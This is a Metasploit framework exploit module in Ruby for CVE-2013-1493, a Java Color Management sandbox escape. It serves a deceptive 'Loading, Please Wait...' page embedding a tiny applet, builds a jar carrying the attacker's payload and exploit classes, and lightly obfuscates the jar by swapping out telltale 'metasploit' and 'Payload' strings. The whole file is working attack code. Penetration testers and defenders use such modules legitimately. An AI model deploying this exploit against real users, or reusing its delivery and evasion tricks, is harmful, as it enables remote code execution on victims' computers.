##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
#   http://metasploit.com/
##
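require 'msf/core'
require 'rex'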
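# Browser exploit for CVE-2013-1493 (Java CMM / Color Management sandbox
# escape).  The module serves a landing page whose <applet> tag points at a
# jar built from the payload plus four precompiled helper classes shipped in
# data/exploits/cve-2013-1493.
#
# Operational notes for whoever runs this:
#   * It does NOT bypass click-to-play; the victim has to accept the Java
#     warning (see 'Description').
#   * on_request_uri answers any client that reaches the listener - nothing in
#     this module restricts who may fetch the landing page or the jar.
#   * The "obfuscation" performed on the jar is a plain byte substitution of a
#     few well-known strings, nothing more.
class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::HttpServer::HTML
  include Msf::Exploit::EXE
  include Msf::Exploit::Remote::BrowserAutopwn
  # Tells BrowserAutopwn that this module needs no client-side JavaScript.
  autopwn_info({ :javascript => false })

  # Module metadata.  'DefaultTarget' => 1 selects the native Windows x86
  # target; target 0 delivers a pure Java payload (usable on other platforms).
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Java CMM Remote Code Execution',
      'Description'    => %q{
        This module abuses the Color Management classes from a Java Applet to run
        arbitrary Java code outside of the sandbox as exploited in the wild in February
        and March of 2013. The vulnerability affects Java version 7u15 and earlier and 6u41
        and earlier and has been tested successfully on Windows XP SP3 and Windows 7 SP1
        systems. This exploit doesn't bypass click-to-play, so the user must accept the java
        warning in order to run the malicious applet.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Unknown',     # Vulnerability discovery and Exploit
          'juan vazquez' # Metasploit module (just ported the published exploit)
        ],
      'References'     =>
        [
          [ 'CVE', '2013-1493' ],
          [ 'OSVDB', '90737' ],
          [ 'BID', '58238' ],
          [ 'URL', 'https://blogs.oracle.com/security/entry/security_alert_cve_2013_1493' ],
          [ 'URL', 'http://www.oracle.com/technetwork/topics/security/alert-cve-2013-1493-1915081.html' ],
          [ 'URL', 'http://pastie.org/pastes/6581034' ]
        ],
      'Platform'       => [ 'win', 'java' ],
      'Payload'        => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true },
      'Targets'        =>
        [
          [ 'Generic (Java Payload)',
            {
              'Platform' => 'java',
              'Arch'     => ARCH_JAVA
            }
          ],
          [ 'Windows x86 (Native Payload)',
            {
              'Platform' => 'win',
              'Arch'     => ARCH_X86
            }
          ]
        ],
      # Was misplaced inside on_request_uri in the pasted copy (a syntax error
      # there); it belongs to the info hash.
      'DefaultTarget'  => 1,
      'DisclosureDate' => 'Mar 01 2013'
    ))
  end

  # Loads the four precompiled applet classes from data/exploits/cve-2013-1493
  # and gives the entry class a random name so the served jar does not carry
  # the well-known "Init" class name.
  #
  # Raises Errno::ENOENT (message includes the path) if a class file is absent.
  def setup
    @init_class           = read_class_file("Init.class")
    @leak_class           = read_class_file("Leak.class")
    @buffered_image_class = read_class_file("MyBufferedImage.class")
    @color_space_class    = read_class_file("MyColorSpace.class")

    # The replacement MUST have the same length as "Init": the rename is a
    # blind byte substitution over the compiled class file, whose constant-pool
    # strings carry explicit length prefixes.  A different length would corrupt
    # the class.  Note it rewrites every occurrence of "Init" in the file, not
    # only the class name - assumes the helper contains no other such token
    # (TODO confirm against the compiled Init.class if it is ever rebuilt).
    @init_class_name = rand_text_alpha("Init".length)
    @init_class      = @init_class.gsub("Init", @init_class_name)

    super
  end

  # HTTP request handler.  Three request shapes are recognised:
  #   *.jar  -> the weaponised applet archive (payload jar + helper classes)
  #   .../   -> the landing page that embeds the applet
  #   other  -> redirect to the resource root so the landing page is served
  #
  # The jar handler uses the `payload` accessor, i.e. the payload most recently
  # produced by regenerate_payload in the landing-page branch.
  def on_request_uri(cli, request)
    print_status("handling request for #{request.uri}")

    case request.uri
    when /\.jar$/i
      send_response(cli, build_applet_jar, { 'Content-Type' => "application/octet-stream" })
    when /\/$/
      # A falsy result means the payload could not be (re)generated; answer
      # 404 rather than serving a page that points at a jar we cannot build.
      unless regenerate_payload(cli)
        print_error("Failed to generate the payload.")
        send_not_found(cli)
        return
      end
      send_response_html(cli, generate_html, { 'Content-Type' => 'text/html' })
    else
      send_redirect(cli, get_resource() + '/', '')
    end
  end

  # Minimal landing page embedding the applet.  The archive name is a fresh
  # random string per request (any *.jar path is served by on_request_uri) and
  # the class name is the random alphabetic string chosen in setup, so both are
  # safe to interpolate into attribute values without escaping.
  #
  # Returns the page as a String.
  def generate_html
    applet_tag = %Q|<applet archive="#{rand_text_alpha(8)}.jar" code="#{@init_class_name}.class" width="1" height="1">|
    [
      %Q|<html><head><title>Loading, Please Wait...</title></head>|,
      %Q|<body><center><p>Loading, Please Wait...</p></center>|,
      applet_tag,
      %Q|</applet></body></html>|
    ].join
  end

  private

  # Reads one helper class from data/exploits/cve-2013-1493 as a binary String.
  def read_class_file(name)
    path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-1493", name)
    File.open(path, "rb") { |fd| fd.read }
  end

  # Packs the current payload's jar together with the exploit classes and
  # scrubs the obvious "metasploit"/"Payload" markers from entry names and
  # entry bytes.  Replacements are length-preserving for the same constant-pool
  # reason as in setup.  This is light obfuscation only - it does not change
  # what the applet does and is not a sandbox or click-to-play bypass.
  #
  # Returns the Rex::Zip::Jar with its manifest rebuilt.
  def build_applet_jar
    jar = payload.encoded_jar
    jar.add_file("#{@init_class_name}.class", @init_class)
    jar.add_file("Leak.class", @leak_class)
    jar.add_file("MyBufferedImage.class", @buffered_image_class)
    jar.add_file("MyColorSpace.class", @color_space_class)

    metasploit_str = rand_text_alpha("metasploit".length)
    payload_str    = rand_text_alpha("payload".length)
    jar.entries.each do |entry|
      entry.name.gsub!("metasploit", metasploit_str)
      entry.name.gsub!("Payload", payload_str)
      entry.data = entry.data.gsub("metasploit", metasploit_str)
      entry.data = entry.data.gsub("Payload", payload_str)
    end

    jar.build_manifest
    jar
  end
end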